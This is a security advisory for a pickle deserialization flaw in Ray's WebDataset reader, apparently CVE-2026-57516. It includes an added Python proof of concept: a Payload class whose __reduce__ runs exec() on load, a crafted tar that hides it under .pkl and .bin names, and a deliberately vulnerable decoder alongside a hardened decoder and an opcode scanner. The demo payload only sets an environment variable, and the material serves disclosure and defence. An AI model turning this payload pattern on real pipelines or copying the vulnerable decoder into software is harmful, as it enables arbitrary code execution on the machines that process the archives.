Remote Code Execution Vulnerability in Ray WebDataset Reader
CVE-2026-57516
8.6 HIGH
What is CVE-2026-57516?
Ray versions prior to 2.56.0 contain an unsafe deserialization vulnerability in the WebDataset reader. An attacker who can supply a tar archive to read_webdataset() can achieve remote code execution: the _default_decoder() function in webdataset_datasource.py selects a decoder purely by file extension and calls pickle.loads() on .pkl/.pickle entries and torch.load() on .pt/.pth entries without validating the entry's contents. Unpickling attacker-controlled bytes runs whatever callable the object's __reduce__ hook names, and torch.load() is pickle-based, so it behaves the same way unless restricted to weights only. A single crafted entry therefore executes arbitrary code inside every Ray remote worker that processes the archive. Pipelines that read archives from untrusted or shared storage should upgrade to Ray 2.56.0 or later.
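The decoder pattern the advisory describes, a crafted archive that exploits it, and the checks a practitioner would run instead, as an added example that is not Ray's code. vulnerable_decode() is a hypothetical stand-in for the extension dispatch attributed to _default_decoder() (pickle.loads() for .pkl/.pickle, torch.load() for .pt/.pth); safe_decode(), flag_unsafe_members(), build_archive(), the Payload class and the PAYLOAD_MARKER name are my own. The payload sets an environment variable via exec() rather than calling os.system() so the effect is observable and harmless, the archive is constructed in memory, and nothing here imports Ray or torch.

```python
"""Added example, not ray.data's code: extension-dispatch decoding of a
WebDataset tar, a crafted member that runs code on load, and two defences."""
import io
import os
import pickle
import pickletools
import tarfile

# Extensions the advisory says are routed to pickle.loads() / torch.load().
# torch.load() is pickle underneath, so it is grouped with the pickle ones.
PICKLE_EXTS = {"pkl", "pickle", "pt", "pth"}

# Environment variable the demo payload sets (constructed marker, not real).
PAYLOAD_MARKER = "WEBDATASET_DEMO_PAYLOAD"


class Payload:
    """Constructed attacker object: unpickling it calls exec() on a string.
    A real payload would call os.system()/subprocess; this one only sets an
    environment variable so the effect is visible and harmless."""

    def __reduce__(self):
        code = f"import os; os.environ[{PAYLOAD_MARKER!r}] = 'ran'"
        return (exec, (code,))


def build_archive(members):
    """Build an in-memory WebDataset-style tar from {name: bytes}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def _ext(name):
    return name.rsplit(".", 1)[-1].lower()


def vulnerable_decode(name, data):
    """Dispatch on extension and deserialise on sight (the advisory's pattern)."""
    if _ext(name) in PICKLE_EXTS:
        return pickle.loads(data)  # attacker's __reduce__ callable runs here
    if _ext(name) == "json":
        return data.decode()
    return data


def safe_decode(name, data):
    """Hardened counterpart: refuse pickle-based members instead of loading."""
    if _ext(name) in PICKLE_EXTS:
        raise ValueError(f"refusing to deserialise {name!r}: pickle-based format")
    if _ext(name) == "json":
        return data.decode()
    return data


def _has_global_opcode(data):
    """True if the bytes parse as a pickle that imports a callable
    (GLOBAL / STACK_GLOBAL), which is what an RCE payload needs."""
    try:
        return any(op.name in ("GLOBAL", "STACK_GLOBAL")
                   for op, _arg, _pos in pickletools.genops(data))
    except Exception:  # not a pickle stream at all
        return False


def flag_unsafe_members(archive_bytes):
    """Pre-flight scan before an archive reaches a WebDataset reader: members
    a pickle-dispatching decoder would unpickle, plus any member that is a
    pickle carrying an import regardless of its extension."""
    flagged = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        for info in tar.getmembers():
            if not info.isfile():
                continue
            data = tar.extractfile(info).read()
            if _ext(info.name) in PICKLE_EXTS or _has_global_opcode(data):
                flagged.append(info.name)
    return flagged


def _decode_all(archive_bytes, decoder):
    """Run a decoder over every member; return the names it refused."""
    refused = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r") as tar:
        for info in tar.getmembers():
            try:
                decoder(info.name, tar.extractfile(info).read())
            except ValueError:
                refused.append(info.name)
    return refused


def demo():
    """Constructed archive: a benign sample, the payload as .pkl, and the
    same payload under a misleading .bin name that extension checks miss."""
    archive = build_archive({
        "sample0.json": b'{"label": 3}',
        "sample0.pkl": pickle.dumps(Payload()),
        "sample0.bin": pickle.dumps(Payload()),
    })
    results = {}
    os.environ.pop(PAYLOAD_MARKER, None)
    _decode_all(archive, vulnerable_decode)
    results["payload_ran_vulnerable"] = os.environ.get(PAYLOAD_MARKER) == "ran"
    os.environ.pop(PAYLOAD_MARKER, None)
    results["refused_by_safe"] = _decode_all(archive, safe_decode)
    results["payload_ran_safe"] = os.environ.get(PAYLOAD_MARKER) == "ran"
    results["flagged_by_scan"] = flag_unsafe_members(archive)
    return results


if __name__ == "__main__":
    print(demo())
```

The extension-based refusal in safe_decode() is the patch-shaped fix; the opcode scan in flag_unsafe_members() goes further and catches a pickle hidden under a harmless-looking name. Treat the scan as a cheap tripwire rather than a parser: bytes that merely begin with a pickle opcode byte (0x93 is STACK_GLOBAL, for instance) can trip it, so a positive hit means quarantine and inspect, not necessarily that an exploit was found.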
Affected Version(s)
Ray, all versions prior to 2.56.0
CVSS v4
Score: 8.6
Severity: HIGH
Confidentiality: High
Integrity: High
Availability: High
Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Undefined
User Interaction: Unknown
Timeline
Vulnerability published
Vulnerability Reserved
Credit
jeremysommerfeld8910-cpu
shakevsky
alexchenai
SSJCorpSec
thesecguy45
sfwani
Rahul Karne
